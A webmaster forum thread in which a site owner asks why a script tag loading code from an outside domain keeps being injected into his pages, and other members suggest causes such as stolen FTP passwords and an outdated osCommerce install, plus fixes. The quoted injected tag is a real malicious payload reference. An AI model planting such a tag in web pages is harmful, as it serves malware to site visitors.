Injected Code into my website

PHPGator

PHPGator

New member
Sep 23, 2009
429
3
0
Oklahoma, USA
www.phpgator.com
A few weeks back I woke up and had Google Webmaster telling me that my site potentially included "malicious spyware / malware". They were nice enough to tell me why they felt that way and pointed me to my source code where I have something like:

<script src="http://domain.in/falb5"></script>

I ended up getting rid of the code out of my header and footer files. I have not noticed anything else different about my site outside of that. I'm still receiving orders and the website has remained up and running.

However, today, the code is back on my website after removing it. I'm not just how it is being injected.

I have contacted my web host but they don't seem to be all that helpful.

Unfortunately I just don't know how this is happening. Any recommendations? I definitely don't need this to keep happening every few weeks.

Thanks!
 


A similar thing happened to me a few years back. In that instance it was a sniffer/trojan running on my home computer and capturing the password I used for the site's FTP. Check your home computer and make sure it is squeaky clean. Then change all your passwords.

Other options include your site being auto hacked (check your logs for requests to nonexistent files = bots attempting to discover common CMSs). This applies if you use a common CMS, if so, then you should update its version. Final option is if another user on the shared server has hacked it - this is unlikely, but maybe you'd want to use my-ip-neighbors.com and see if any of the other sites have the same code on them.

Good luck bro.
 
I am using cPanel version 11.28.52.

I am also using an older version of OSCommerce to process orders. The odd part is that the files being manipulated are custom files that I have developed. Would OSCommerce still be able to inject code into files not associated with it?

I am going to change my password to see if that helps and I won't login from my home computer for a while and we'll see what happens. It is definitely a little bit unnerving knowing that something or someone has that type of access to my website though.
 
Hmmm, just read about it online, it does have to do with OSCommerce being an older version. Apparently there are hundreds of russian domains going after them and just one of the domains affected nearly 3000 websites. Time for an upgrade!
 
Check your file permissions. Any file which doesn't need to update itself should be CMOD 644. Yes, that includes your site's themes after you've made changes to them.
 
Stored FTP passwords from old versions of Total Commander could be haxored
 
Stored FTP passwords from old versions of Total Commander could be haxored
Click to expand...

Also some not-so-old versions of FileZilla are vulnerable to trojans.
 
I had the same thing happen a few months ago. call up support and have them look at the logins being made adn from where. then change your cpanel password.
 
You must log in or register to reply here.
Top Bottom
Back